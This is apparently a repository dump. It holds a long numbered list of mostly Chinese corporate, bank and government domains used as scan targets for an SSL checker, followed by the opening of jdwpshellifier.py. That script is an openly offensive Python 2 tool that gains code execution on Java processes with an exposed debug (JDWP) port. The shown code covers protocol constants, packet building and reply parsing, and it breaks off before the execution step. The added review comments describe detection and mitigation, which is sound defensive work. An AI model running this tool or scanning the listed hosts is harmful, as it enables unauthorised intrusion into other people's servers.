airchina.com.cn 340 | spacebuilder.cn 341 | eyou.net 342 | didatuan.com 343 | jstv.com 344 | v2ex.com 345 | yesky.com 346 | nsfocus.com 347 | qiushibaike.com 348 | anjuke.com 349 | hexun.com 350 | cmbc.com.cn 351 | founderbn.com 352 | youmi.cn 353 | ceair.com 354 | sdcms.cn 355 | go.cn 356 | now.cn 357 | safedog.cn 358 | hiwifi.com 359 | hiwifi.com 360 | jeecms.com 361 | gewara.com 362 | rong360.com 363 | renrendai.com 364 | zzidc.com 365 | jiuxian.com 366 | yinyuetai.com 367 | tcl.com 368 | sootoo.com 369 | ppdai.com 370 | locojoy.com 371 | 5sing.com 372 | candou.com 373 | appchina.com 374 | 300.cn 375 | phpstat.net 376 | 52pk.com 377 | shendu.com 378 | ccidnet.com 379 | diditaxi.com.cn 380 | jiankongbao.com 381 | tcl.com 382 | aicai.com 383 | smartisan.cn 384 | 2caipiao.com 385 | sto.cn 386 | duokan.com 387 | cndns.com 388 | haier.net 389 | haier.com 
390 | ehaier.com 391 | jushanghui.com 392 | hairongyi.com 393 | ooopic.com 394 | autohome.com.cn 395 | che168.com 396 | pp.cc 397 | super8.com.cn 398 | 17k.com 399 | 59.cn 400 | zhaopin.com 401 | amazon.cn 402 | yundaex.com 403 | 51zhangdan.com 404 | leiphone.com 405 | ikuai8.com 406 | aoshitang.com 407 | codoon.com 408 | ztgame.com 409 | moko.cc 410 | nuomi.com 411 | liba.com 412 | tuan800.com 413 | bizcn.com 414 | destoon.com 415 | 22.cn 416 | baofeng.com 417 | zgsj.com 418 | chuangxin.com 419 | diyou.cn 420 | zbird.com 421 | e-chinalife.com 422 | kuaiyong.com 423 | v5shop.com.cn 424 | zuzuche.com 425 | chinapost.com.cn 426 | pook.com 427 | 4.cn 428 | crsky.com 429 | wandoujia.com 430 | oupeng.com 431 | h3c.com 432 | pcauto.com.cn 433 | pclady.com.cn 434 | pcbaby.com.cn 435 | pcgames.com.cn 436 | pchouse.com.cn 437 | baomihua.com 438 | dolphin.com 439 | pcpop.com 440 | itpub.net 441 | zhe800.com 442 | caijing.com.cn 443 | hikvision.com 444 | bitauto.com 445 | fengyunzhibo.com 446 | app111.com 447 | hanweb.com 448 | id5.cn 449 | jumei.com 450 | onefoundation.cn 451 | weipai.cn 452 | zuche.com 453 | sfbest.com 454 | dbappsecurity.com.cn 455 | jobui.com 456 | imobile.com.cn 457 | shenzhenair.com 458 | douguo.com 459 | diyicai.com 460 | kuwo.cn 461 | csair.com 462 | mama.cn 463 | 115.com 464 | foxitsoftware.cn 465 | zto.cn 466 | cofco.com 467 | mycolorway.com 468 | breadtrip.com 469 | qiniu.com 470 | mingdao.com 471 | zoomla.cn 472 | ename.cn 473 | 10086.cn 474 | icafe8.com 475 | anymacro.com 476 | zhujiwu.com 477 | ele.me 478 | phpyun.com 479 | thinkphp.cn 480 | 500wan.com 481 | paidai.com 482 | fumu.com 483 | homeinns.com 484 | chinabank.com.cn 485 | meishichina.com 486 | hinews.cn 487 | jj.cn 488 | immomo.com 489 | cnaaa.com 490 | duobei.com 491 | gw.com.cn 492 | tieyou.com 493 | qibosoft.com 494 | zqgame.com 495 | meilishuo.com 496 | sitestar.cn 497 | qmango.com 498 | sohu.com 499 | onlylady.com 500 | edong.com 501 | 99bill.com 502 | 12321.cn 503 | kongzhong.com 
504 | ucloud.cn 505 | kuaidadi.com 506 | cyzone.cn 507 | ujipin.com 508 | 189.cn 509 | damai.cn 510 | jinjianginns.com 511 | stockstar.com 512 | shipin7.com 513 | zdnet.com.cn 514 | segmentfault.com 515 | netentsec.com 516 | spb.gov.cn 517 | cnzxsoft.com 518 | chinaamc.com 519 | jb51.net 520 | cmstop.com 521 | lecai.com 522 | yongche.com 523 | pingan.com 524 | 51credit.com 525 | cnfol.com 526 | china-sss.com 527 | btcchina.com 528 | okcoin.com 529 | kaspersky.com.cn 530 | yinxiang.com 531 | nipic.com 532 | antiy.com 533 | juhe.cn 534 | wumii.org 535 | uzai.com 536 | anzhi.com 537 | yto.net.cn 538 | 58pic.com 539 | t3.com.cn 540 | aibang.com 541 | yaolan.com 542 | zhongchou.com 543 | ubuntu.org.cn 544 | smartisan.com 545 | hb-n-tax.gov.cn 546 | chanjet.com 547 | bytedance.com 548 | 1hai.cn 549 | tebon.com.cn 550 | tdxinfo.com 551 | tujia.com 552 | cmbchina.com 553 | xinnet.com 554 | dbw.cn 555 | pingan.com 556 | legendsec.com 557 | woniu.com 558 | mcafee.com 559 | vasee.com 560 | juesheng.com 561 | wasu.cn 562 | wowsai.com 563 | chinadaily.com.cn 564 | 51talk.com 565 | mbachina.com 566 | ifanr.com 567 | boc.cn 568 | jiathis.com 569 | gongchang.com 570 | nbcb.com.cn 571 | 91160.com 572 | yuantiku.com 573 | imooc.com 574 | gf.com.cn 575 | bangcle.com 576 | zhuqu.com 577 | cnmo.com 578 | 17ugo.com 579 | zcool.com.cn 580 | jiemian.com 581 | creditease.cn 582 | creditease.cn 583 | ebay.com 584 | 12308.com 585 | 7po.com 586 | itenable.com.cn 587 | tesla.cn 588 | szse.cn 589 | enorth.com.cn 590 | newone.com.cn 591 | haodai.com 592 | cdb.com.cn 593 | sino-life.com 594 | coocaa.com 595 | cgbchina.com.cn 596 | 17500.cn 597 | chsi.com.cn 598 | chsi.com.cn 599 | cnpc.com.cn 600 | petrochina.com.cn 601 | welomo.com 602 | zank.mobi 603 | kf5.com 604 | ehaier.com 605 | piccnet.com.cn 606 | 88.com.cn 607 | shenhuagroup.com.cn 608 | unionpayintl.com 609 | unionpay.com 610 | youzu.com 611 | yxdown.com 612 | 56.com 613 | gopay.com.cn 614 | wiwide.com 615 | fesco.com.cn 616 | 
samsung.com 617 | sfn.cn 618 | chinaums.com 619 | htsc.com.cn 620 | ciwong.com 621 | hp.com 622 | itouzi.com 623 | ecitic.com 624 | to8to.com 625 | camera360.com 626 | cfsc.com.cn 627 | ebscn.com 628 | 24cp.com 629 | chinahr.com 630 | sinopec.com 631 | mcdonalds.com.cn 632 | chexun.com 633 | jinri.cn 634 | psbc.com 635 | swsresearch.com 636 | picchealth.com 637 | cnooc.com.cn 638 | yohobuy.com 639 | h3c.com 640 | icbccs.com.cn 641 | aol.com 642 | umetrip.com 643 | sunits.com 644 | youyuan.com 645 | cdrcb.com 646 | comba.com.cn 647 | adtsec.com 648 | nffund.com 649 | zhaoshang.net 650 | cytobacco.com 651 | weizhonggou.com 652 | addnewer.com 653 | scti.cn 654 | feiniu.com 655 | chinapnr.com 656 | heetian.com 657 | yungouos.com 658 | zjedu.org 659 | ccic-net.com.cn 660 | shengpay.com 661 | yirendai.com 662 | essence.com.cn 663 | 1218.com.cn 664 | 228.com.cn 665 | anbanggroup.com 666 | m6go.com 667 | xiangshe.com 668 | yirendai.com 669 | vvipone.com 670 | 51jingying.com 671 | cmbc.com.cn 672 | 51idc.com 673 | autono1.com 674 | jsbchina.cn 675 | dfzq.com.cn 676 | ssscc.com.cn 677 | chaoxing.com 678 | yingjiesheng.com 679 | thfund.com.cn 680 | duxiu.com 681 | myfund.com 682 | x.com.cn 683 | itouzi.com 684 | cits.cn 685 | lufax.com 686 | hongkongairlines.com 687 | touna.cn 688 | hhedai.com 689 | jinlianchu.com 690 | tsinghua.edu.cn 691 | qufenqi.com 692 | tcl.com 693 | pinganfang.com 694 | boqii.com 695 | plu.cn 696 | flnet.com 697 | beibei.com 698 | mizhe.com 699 | vivo.com.cn 700 | ahtv.cn 701 | daling.com 702 | cankaoxiaoxi.com 703 | s.cn 704 | lingying.com 705 | voc.com.cn 706 | wacai.com 707 | bankofshanghai.com 708 | wukonglicai.com 709 | zszq.com 710 | fanhuan.com 711 | yixin.com 712 | 91jinrong.com 713 | cec.com.cn 714 | jxlife.com.cn 715 | csrc.gov.cn 716 | dianrong.com 717 | leyou.com.cn 718 | benlai.com 719 | cdce.cn 720 | gewara.com 721 | fxiaoke.com 722 | metao.com 723 | minmetals.com.cn 724 | jzjt.com 725 | sinosig.com 726 | umpay.com 727 | sgcc.com.cn 728 | 
phfund.com.cn 729 | cmfchina.com 730 | ncfund.com.cn 731 | epf.com.cn 732 | fengjr.com 733 | fsfund.com 734 | orient-fund.com 735 | epf.com.cn 736 | gtfund.com 737 | hazq.com 738 | aeonlife.com.cn 739 | jyvpfund.com 740 | lionfund.com.cn 741 | sursen.net 742 | hzhz.co 743 | ctfund.com 744 | hit.edu.cn 745 | fund001.com 746 | 163disk.com 747 | bcia.com.cn 748 | qidian.com 749 | kyfw.12306.cn -------------------------------------------------------------------------------- /sslchecker/host.txt: -------------------------------------------------------------------------------- 1 | tencent.com 2 | baidu.com 3 | sina.com.cn 4 | sohu.com 5 | discuz.net 6 | rising.com.cn 7 | alibaba.com 8 | 360.cn 9 | maxthon.cn 10 | renren.com 11 | ifeng.com 12 | snda.com 13 | sdo.com 14 | sogou.com 15 | 163.com 16 | 9you.com 17 | duba.net 18 | xunlei.com 19 | ctrip.com 20 | 19lou.com 21 | shooter.cn 22 | verycd.com 23 | mop.com 24 | ourgame.com 25 | douban.com 26 | youku.com 27 | wanmei.com 28 | 39.net 29 | uc.cn 30 | pps.tv 31 | taobao.com 32 | blogbus.com 33 | shopex.cn 34 | gtja.com 35 | alipay.com 36 | phpwind.net 37 | ftchinese.com 38 | lenovo.com 39 | www.net.cn 40 | 17173.com 41 | qiyi.com 42 | focus.cn 43 | chinaren.com 44 | tudou.com 45 | ztgame.com 46 | mtime.com 47 | tompda.com 48 | 51.com 49 | shandagames.com 50 | 4399.com 51 | jiepang.com 52 | it168.com 53 | huawei.com 54 | ku6.com 55 | dxy.cn 56 | xiami.com 57 | xywy.com 58 | qunar.com 59 | 7daysinn.cn 60 | phpcms.cn 61 | pipi.cn 62 | 58.com 63 | ganji.com 64 | chinaunix.net 65 | songtaste.com 66 | gaopeng.com 67 | duowan.com 68 | dnspod.cn 69 | tuchong.com 70 | yeepay.com 71 | the9.com 72 | ylmf.com 73 | cnzz.com 74 | lianzhong.com 75 | pindao.com 76 | jd.com 77 | dzwww.com 78 | 91wan.com 79 | guokr.com 80 | newegg.com.cn 81 | lashou.com 82 | 55tuan.com 83 | zhihu.com 84 | cnbeta.com 85 | pptv.com 86 | 9158.com 87 | ubox.cn 88 | hudong.com 89 | sangfor.com.cn 90 | vancl.com 91 | unnoo.com 92 | sucop.com 93 | bianfeng.com 94 
| 6.cn 95 | elong.com 96 | 10jqka.com.cn 97 | anquanbao.com 98 | taomee.com 99 | yxlink.com 100 | php.net 101 | coremail.cn 102 | crucco.com 103 | zhenai.com 104 | dangdang.com 105 | aipai.com 106 | xiaomi.com 107 | joy.cn 108 | letao.com 109 | jingwei.com 110 | 51job.com 111 | changyou.com 112 | hada.me 113 | sf-express.com 114 | kingsoft.com 115 | leyou.com 116 | jiayuan.com 117 | soufun.com 118 | youtx.com 119 | lefeng.com 120 | yoybuy.com 121 | eset.com.cn 122 | 7k7k.com 123 | aqgj.cn 124 | guosen.com.cn 125 | ly.com 126 | tom.com 127 | cntv.cn 128 | veryeast.cn 129 | 12306.cn 130 | goodbaby.com 131 | cenwor.com 132 | tttuangou.net 133 | jiangmin.com 134 | yonyou.com 135 | ccw.com.cn 136 | vip.com 137 | ftsafe.com.cn 138 | csdn.net 139 | topsec.com.cn 140 | west263.com 141 | wanda.cn 142 | letv.com 143 | dns.com.cn 144 | diandian.com 145 | kugou.com 146 | syyx.com 147 | xiu.com 148 | baihe.com 149 | kingdee.com 150 | iboxpay.com 151 | 21cn.com 152 | nokia.com 153 | playcool.com 154 | duote.com 155 | wdlinux.cn 156 | yupoo.com 157 | 263.net 158 | coo8.com 159 | 36kr.com 160 | dahe.cn 161 | yahoo.com 162 | cmseasy.cn 163 | tianya.cn 164 | suning.com 165 | zol.com.cn 166 | easybuy.com.cn 167 | gome.com.cn 168 | jiajia.me 169 | 5173.com 170 | baobeihuijia.com 171 | thinksky.hk 172 | neusoft.com 173 | gamemayi.com 174 | 51web.com 175 | dajie.com 176 | qianpin.com 177 | 2345.com 178 | 51cto.com 179 | guang.com 180 | lvmama.com 181 | happigo.com 182 | m18.com 183 | gooann.com 184 | lakala.com 185 | knownsec.com 186 | 99.com 187 | xd.com 188 | jiapin.com 189 | docin.com 190 | ip66.com 191 | tnyoo.com 192 | cwan.com 193 | dianping.com 194 | sclub.com.tw 195 | iciba.com 196 | xoyo.com 197 | ijinshan.com 198 | xueqiu.com 199 | chinacache.com 200 | hx168.com.cn 201 | 17sup.com 202 | mangocity.com 203 | shop.edu.cn 204 | tiexue.net 205 | cpic.com.cn 206 | venustech.com.cn 207 | huatu.com 208 | 178.com 209 | yihaodian.com 210 | house365.com 211 | 51greenorange.com 212 | 
360shop.com.cn 213 | weibo.com 214 | touzhu.cn 215 | qiaogu.com 216 | zblogcn.com 217 | firefox.com.cn 218 | xcar.com.cn 219 | goldmail.cn 220 | trip8080.com 221 | baijob.com 222 | zhubajie.com 223 | acfun.tv 224 | qfpay.com 225 | xianguo.com 226 | tp-link.com.cn 227 | zhenpin.com 228 | hiall.com.cn 229 | 800app.com 230 | yuantiku.com 231 | redbaby.com.cn 232 | baixing.com 233 | 2cto.com 234 | linktrust.com.cn 235 | womai.com 236 | tuciabbay.com 237 | 1ting.com 238 | akcms.com 239 | kingosoft.com 240 | meitu.com 241 | meizu.com 242 | taocms.org 243 | 53kf.com 244 | oschina.net 245 | thinksns.com 246 | hxage.com 247 | moliyo.com 248 | 3158.cn 249 | oppo.com 250 | tuniu.com 251 | 3158.com 252 | meituan.com 253 | eversec.com.cn 254 | kuaibo.com 255 | cins.cn 256 | papa.me 257 | 591wed.com 258 | cheshi.com 259 | shopxx.net 260 | shopxx.net 261 | m1905.com 262 | argos.cn 263 | tgbus.com 264 | mafengwo.cn 265 | cnblogs.com 266 | fun.tv 267 | hupu.com 268 | sudu.cn 269 | feng.com 270 | nandu.com 271 | changba.com 272 | jinwankansha.com 273 | 51bi.com 274 | chinaz.com 275 | umeng.com 276 | mogujie.com 277 | xinghua.org.cn 278 | coolping.com 279 | chinanetcenter.com 280 | iyiyun.com 281 | yunyun.com 282 | eguan.cn 283 | winenice.com 284 | opera.com 285 | zhimei.com 286 | tongbu.com 287 | haodf.com 288 | 3322.org 289 | dodonew.com 290 | lesuke.com 291 | iiyi.com 292 | sudytech.com 293 | 8684.cn 294 | bjsako.com 295 | newsmyshop.com 296 | tiancity.com 297 | looyu.com 298 | jollymm.com 299 | dopool.com 300 | fantong.com 301 | zhuna.cn 302 | secoo.com 303 | gamtee.com 304 | huanqiu.com 305 | kanglu.com 306 | wssys.net 307 | xinnet.com 308 | ebrun.com 309 | duoshuo.com 310 | bilibili.tv 311 | gfan.com 312 | pconline.com.cn 313 | 50cms.com 314 | trs.com.cn 315 | xdf.cn 316 | htinns.com 317 | wacai.com 318 | mplife.com 319 | donews.com 320 | qyer.com 321 | 9978.cn 322 | admin5.com 323 | etuan.com 324 | liepin.com 325 | 998.com 326 | eastmoney.com 327 | hc360.com 328 | 
welove520.com 329 | autonavi.com 330 | lusen.com 331 | ecisp.cn 332 | lightinthebox.com 333 | desdev.cn 334 | sgcc.com.cn 335 | mydrivers.com 336 | zte.com.cn 337 | 56.com 338 | mbaobao.com 339 | airchina.com.cn 340 | spacebuilder.cn 341 | eyou.net 342 | didatuan.com 343 | jstv.com 344 | v2ex.com 345 | yesky.com 346 | nsfocus.com 347 | qiushibaike.com 348 | anjuke.com 349 | hexun.com 350 | cmbc.com.cn 351 | founderbn.com 352 | youmi.cn 353 | ceair.com 354 | sdcms.cn 355 | go.cn 356 | now.cn 357 | safedog.cn 358 | hiwifi.com 359 | hiwifi.com 360 | jeecms.com 361 | gewara.com 362 | rong360.com 363 | renrendai.com 364 | zzidc.com 365 | jiuxian.com 366 | yinyuetai.com 367 | tcl.com 368 | sootoo.com 369 | ppdai.com 370 | locojoy.com 371 | 5sing.com 372 | candou.com 373 | appchina.com 374 | 300.cn 375 | phpstat.net 376 | 52pk.com 377 | shendu.com 378 | ccidnet.com 379 | diditaxi.com.cn 380 | jiankongbao.com 381 | tcl.com 382 | aicai.com 383 | smartisan.cn 384 | 2caipiao.com 385 | sto.cn 386 | duokan.com 387 | cndns.com 388 | haier.net 389 | haier.com 390 | ehaier.com 391 | jushanghui.com 392 | hairongyi.com 393 | ooopic.com 394 | autohome.com.cn 395 | che168.com 396 | pp.cc 397 | super8.com.cn 398 | 17k.com 399 | 59.cn 400 | zhaopin.com 401 | amazon.cn 402 | yundaex.com 403 | 51zhangdan.com 404 | leiphone.com 405 | ikuai8.com 406 | aoshitang.com 407 | codoon.com 408 | ztgame.com 409 | moko.cc 410 | nuomi.com 411 | liba.com 412 | tuan800.com 413 | bizcn.com 414 | destoon.com 415 | 22.cn 416 | baofeng.com 417 | zgsj.com 418 | chuangxin.com 419 | diyou.cn 420 | zbird.com 421 | e-chinalife.com 422 | kuaiyong.com 423 | v5shop.com.cn 424 | zuzuche.com 425 | chinapost.com.cn 426 | pook.com 427 | 4.cn 428 | crsky.com 429 | wandoujia.com 430 | oupeng.com 431 | h3c.com 432 | pcauto.com.cn 433 | pclady.com.cn 434 | pcbaby.com.cn 435 | pcgames.com.cn 436 | pchouse.com.cn 437 | baomihua.com 438 | dolphin.com 439 | pcpop.com 440 | itpub.net 441 | zhe800.com 442 | caijing.com.cn 443 | 
hikvision.com 444 | bitauto.com 445 | fengyunzhibo.com 446 | app111.com 447 | hanweb.com 448 | id5.cn 449 | jumei.com 450 | onefoundation.cn 451 | weipai.cn 452 | zuche.com 453 | sfbest.com 454 | dbappsecurity.com.cn 455 | jobui.com 456 | imobile.com.cn 457 | shenzhenair.com 458 | douguo.com 459 | diyicai.com 460 | kuwo.cn 461 | csair.com 462 | mama.cn 463 | 115.com 464 | foxitsoftware.cn 465 | zto.cn 466 | cofco.com 467 | mycolorway.com 468 | breadtrip.com 469 | qiniu.com 470 | mingdao.com 471 | zoomla.cn 472 | ename.cn 473 | 10086.cn 474 | icafe8.com 475 | anymacro.com 476 | zhujiwu.com 477 | ele.me 478 | phpyun.com 479 | thinkphp.cn 480 | 500wan.com 481 | paidai.com 482 | fumu.com 483 | homeinns.com 484 | chinabank.com.cn 485 | meishichina.com 486 | hinews.cn 487 | jj.cn 488 | immomo.com 489 | cnaaa.com 490 | duobei.com 491 | gw.com.cn 492 | tieyou.com 493 | qibosoft.com 494 | zqgame.com 495 | meilishuo.com 496 | sitestar.cn 497 | qmango.com 498 | sohu.com 499 | onlylady.com 500 | edong.com 501 | 99bill.com 502 | 12321.cn 503 | kongzhong.com 504 | ucloud.cn 505 | kuaidadi.com 506 | cyzone.cn 507 | ujipin.com 508 | 189.cn 509 | damai.cn 510 | jinjianginns.com 511 | stockstar.com 512 | shipin7.com 513 | zdnet.com.cn 514 | segmentfault.com 515 | netentsec.com 516 | spb.gov.cn 517 | cnzxsoft.com 518 | chinaamc.com 519 | jb51.net 520 | cmstop.com 521 | lecai.com 522 | yongche.com 523 | pingan.com 524 | 51credit.com 525 | cnfol.com 526 | china-sss.com 527 | btcchina.com 528 | okcoin.com 529 | kaspersky.com.cn 530 | yinxiang.com 531 | nipic.com 532 | antiy.com 533 | juhe.cn 534 | wumii.org 535 | uzai.com 536 | anzhi.com 537 | yto.net.cn 538 | 58pic.com 539 | t3.com.cn 540 | aibang.com 541 | yaolan.com 542 | zhongchou.com 543 | ubuntu.org.cn 544 | smartisan.com 545 | hb-n-tax.gov.cn 546 | chanjet.com 547 | bytedance.com 548 | 1hai.cn 549 | tebon.com.cn 550 | tdxinfo.com 551 | tujia.com 552 | cmbchina.com 553 | xinnet.com 554 | dbw.cn 555 | pingan.com 556 | legendsec.com 
557 | woniu.com 558 | mcafee.com 559 | vasee.com 560 | juesheng.com 561 | wasu.cn 562 | wowsai.com 563 | chinadaily.com.cn 564 | 51talk.com 565 | mbachina.com 566 | ifanr.com 567 | boc.cn 568 | jiathis.com 569 | gongchang.com 570 | nbcb.com.cn 571 | 91160.com 572 | yuantiku.com 573 | imooc.com 574 | gf.com.cn 575 | bangcle.com 576 | zhuqu.com 577 | cnmo.com 578 | 17ugo.com 579 | zcool.com.cn 580 | jiemian.com 581 | creditease.cn 582 | creditease.cn 583 | ebay.com 584 | 12308.com 585 | 7po.com 586 | itenable.com.cn 587 | tesla.cn 588 | szse.cn 589 | enorth.com.cn 590 | newone.com.cn 591 | haodai.com 592 | cdb.com.cn 593 | sino-life.com 594 | coocaa.com 595 | cgbchina.com.cn 596 | 17500.cn 597 | chsi.com.cn 598 | chsi.com.cn 599 | cnpc.com.cn 600 | petrochina.com.cn 601 | welomo.com 602 | zank.mobi 603 | kf5.com 604 | ehaier.com 605 | piccnet.com.cn 606 | 88.com.cn 607 | shenhuagroup.com.cn 608 | unionpayintl.com 609 | unionpay.com 610 | youzu.com 611 | yxdown.com 612 | 56.com 613 | gopay.com.cn 614 | wiwide.com 615 | fesco.com.cn 616 | samsung.com 617 | sfn.cn 618 | chinaums.com 619 | htsc.com.cn 620 | ciwong.com 621 | hp.com 622 | itouzi.com 623 | ecitic.com 624 | to8to.com 625 | camera360.com 626 | cfsc.com.cn 627 | ebscn.com 628 | 24cp.com 629 | chinahr.com 630 | sinopec.com 631 | mcdonalds.com.cn 632 | chexun.com 633 | jinri.cn 634 | psbc.com 635 | swsresearch.com 636 | picchealth.com 637 | cnooc.com.cn 638 | yohobuy.com 639 | h3c.com 640 | icbccs.com.cn 641 | aol.com 642 | umetrip.com 643 | sunits.com 644 | youyuan.com 645 | cdrcb.com 646 | comba.com.cn 647 | adtsec.com 648 | nffund.com 649 | zhaoshang.net 650 | cytobacco.com 651 | weizhonggou.com 652 | addnewer.com 653 | scti.cn 654 | feiniu.com 655 | chinapnr.com 656 | heetian.com 657 | yungouos.com 658 | zjedu.org 659 | ccic-net.com.cn 660 | shengpay.com 661 | yirendai.com 662 | essence.com.cn 663 | 1218.com.cn 664 | 228.com.cn 665 | anbanggroup.com 666 | m6go.com 667 | xiangshe.com 668 | yirendai.com 669 | 
vvipone.com 670 | 51jingying.com 671 | cmbc.com.cn 672 | 51idc.com 673 | autono1.com 674 | jsbchina.cn 675 | dfzq.com.cn 676 | ssscc.com.cn 677 | chaoxing.com 678 | yingjiesheng.com 679 | thfund.com.cn 680 | duxiu.com 681 | myfund.com 682 | x.com.cn 683 | itouzi.com 684 | cits.cn 685 | lufax.com 686 | hongkongairlines.com 687 | touna.cn 688 | hhedai.com 689 | jinlianchu.com 690 | tsinghua.edu.cn 691 | qufenqi.com 692 | tcl.com 693 | pinganfang.com 694 | boqii.com 695 | plu.cn 696 | flnet.com 697 | beibei.com 698 | mizhe.com 699 | vivo.com.cn 700 | ahtv.cn 701 | daling.com 702 | cankaoxiaoxi.com 703 | s.cn 704 | lingying.com 705 | voc.com.cn 706 | wacai.com 707 | bankofshanghai.com 708 | wukonglicai.com 709 | zszq.com 710 | fanhuan.com 711 | yixin.com 712 | 91jinrong.com 713 | cec.com.cn 714 | jxlife.com.cn 715 | csrc.gov.cn 716 | dianrong.com 717 | leyou.com.cn 718 | benlai.com 719 | cdce.cn 720 | gewara.com 721 | fxiaoke.com 722 | metao.com 723 | minmetals.com.cn 724 | jzjt.com 725 | sinosig.com 726 | umpay.com 727 | sgcc.com.cn 728 | phfund.com.cn 729 | cmfchina.com 730 | ncfund.com.cn 731 | epf.com.cn 732 | fengjr.com 733 | fsfund.com 734 | orient-fund.com 735 | epf.com.cn 736 | gtfund.com 737 | hazq.com 738 | aeonlife.com.cn 739 | jyvpfund.com 740 | lionfund.com.cn 741 | sursen.net 742 | hzhz.co 743 | ctfund.com 744 | hit.edu.cn 745 | fund001.com 746 | 163disk.com 747 | bcia.com.cn 748 | qidian.com 749 | kyfw.12306.cn -------------------------------------------------------------------------------- /jdwp/jdwpshellifier.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ################################################################################ 3 | # 4 | # Univeral JDWP shellifier 5 | # 6 | # @_hugsy_ 7 | # 8 | # And special cheers to @lanjelot 9 | # 10 | 11 | import socket 12 | import time 13 | import sys 14 | import struct 15 | import urllib 16 | import argparse 17 | 18 | 19 | 20 | 
################################################################################
#
# JDWP protocol variables
#
# NOTE(review): this file is Python 2 (print statements, dict.iteritems(),
# dict.has_key(), `except Exception, e`); it does not run unmodified under
# Python 3.
#
# Defender's summary: everything below is an ordinary JDWP session.  JDWP has
# no authentication step, so a debug agent listening on a reachable interface
# hands full in-process code execution to any client that completes the
# 14-byte handshake.  The literal handshake string and the default port 8000
# used here are the easiest network-detection signatures; the mitigation is
# to not enable the agent on production JVMs, or to bind it to loopback only.
#

# Plain-text banner exchanged in both directions before any packet (see
# handshake()).
HANDSHAKE = "JDWP-Handshake"

# Values of the 1-byte "flags" field in the packet header.
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80

# Command signatures
# Each entry is a (command set, command) pair as defined by the JDWP spec:
# set 1 = VirtualMachine, 2 = ReferenceType, 3 = ClassType,
# 9 = ObjectReference, 10 = StringReference, 11 = ThreadReference,
# 15 = EventRequest.
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)

# Other codes
# Event-request modifier kinds (only MODKIND_LOCATIONONLY is used below).
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
# Event kind requested by runtime_exec().
EVENT_BREAKPOINT = 2
# Suspend policies; send_event() always uses SUSPEND_ALL.
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
# Error codes; declared but not referenced in this file.
NOT_IMPLEMENTED = 99
VM_DEAD = 112
INVOKE_SINGLE_THREADED = 2
# Value tags: 76 is ASCII 'L' (object reference), 115 is ASCII 's' (string).
TAG_OBJECT = 76
TAG_STRING = 115
# Type tag used when building a location (class as opposed to interface/array).
TYPE_CLASS = 1


################################################################################
#
# JDWP client class
#
class JDWPClient:
    """Minimal JDWP wire-protocol client.

    Holds one TCP socket to the debug agent, a monotonically increasing
    packet id, and per-class caches of method and field tables.  All methods
    that talk to the agent are synchronous: send one command packet, block on
    read_reply().  Attributes such as objectIDSize, vmName and classes are
    created dynamically by idsizes(), getversion() and allclasses(), so
    start() must run before any other request helper is used.
    """

    def __init__(self, host, port=8000):
        # host/port are only stored here; the connection is made in start().
        self.host = host
        self.port = port
        # refTypeId -> list of method entry dicts (filled by get_methods()).
        self.methods = {}
        # refTypeId -> list of field entry dicts (filled by getfields()).
        self.fields = {}
        # Next packet id; incremented by 2 per packet in create_packet().
        self.id = 0x01
        return

    def create_packet(self, cmdsig, data=""):
        """Build one JDWP command packet.

        The 11-byte header is length, id, flags, command set, command
        (">IIccc"); `data` is appended verbatim as the payload.  The packet
        id is advanced as a side effect.
        """
        flags = 0x00
        cmdset, cmd = cmdsig
        # Total length includes the 11-byte header.
        pktlen = len(data) + 11
        pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd))
        pkt+= data
        self.id += 2
        return pkt

    def read_reply(self):
        """Read one reply packet and return its payload (without header).

        Raises Exception when a reply carries a non-zero error code.
        NOTE(review): a single recv(11) may return fewer than 11 bytes on a
        stream socket, which would make struct.unpack raise; and an empty
        recv() in the loop means the peer closed the connection, yet the loop
        sleeps and retries forever instead of failing.  Both are worth
        hardening if this client is reused.
        """
        header = self.socket.recv(11)
        pktlen, id, flags, errcode = struct.unpack(">IIcH", header)

        if flags == chr(REPLY_PACKET_TYPE):
            if errcode :
                raise Exception("Received errcode %d" % errcode)

        buf = ""
        # Accumulate until the payload length announced in the header is met.
        while len(buf) + 11 < pktlen:
            data = self.socket.recv(1024)
            if len(data):
                buf += data
            else:
                time.sleep(1)
        return buf

    def parse_entries(self, buf, formats, explicit=True):
        """Decode a reply payload into a list of dicts.

        `formats` is a sequence of (fmt, name) pairs consumed in order for
        each entry.  fmt is one of: "L"/8 (8-byte id), "I"/4 (4-byte int),
        'S' (length-prefixed string), 'C' (one byte), 'Z' (tagged value).
        When `explicit` is true the payload starts with a 4-byte entry count;
        otherwise exactly one entry is decoded.  Exits the process on an
        unknown format code.
        """
        entries = []
        index = 0


        if explicit:
            nb_entries = struct.unpack(">I", buf[:4])[0]
            buf = buf[4:]
        else:
            nb_entries = 1

        for i in range(nb_entries):
            data = {}
            for fmt, name in formats:
                if fmt == "L" or fmt == 8:
                    data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0])
                    index += 8
                elif fmt == "I" or fmt == 4:
                    data[name] = int(struct.unpack(">I", buf[index:index+4])[0])
                    index += 4
                elif fmt == 'S':
                    # 4-byte big-endian length followed by the raw bytes.
                    l = struct.unpack(">I", buf[index:index+4])[0]
                    data[name] = buf[index+4:index+4+l]
                    index += 4+l
                elif fmt == 'C':
                    data[name] = ord(struct.unpack(">c", buf[index])[0])
                    index += 1
                elif fmt == 'Z':
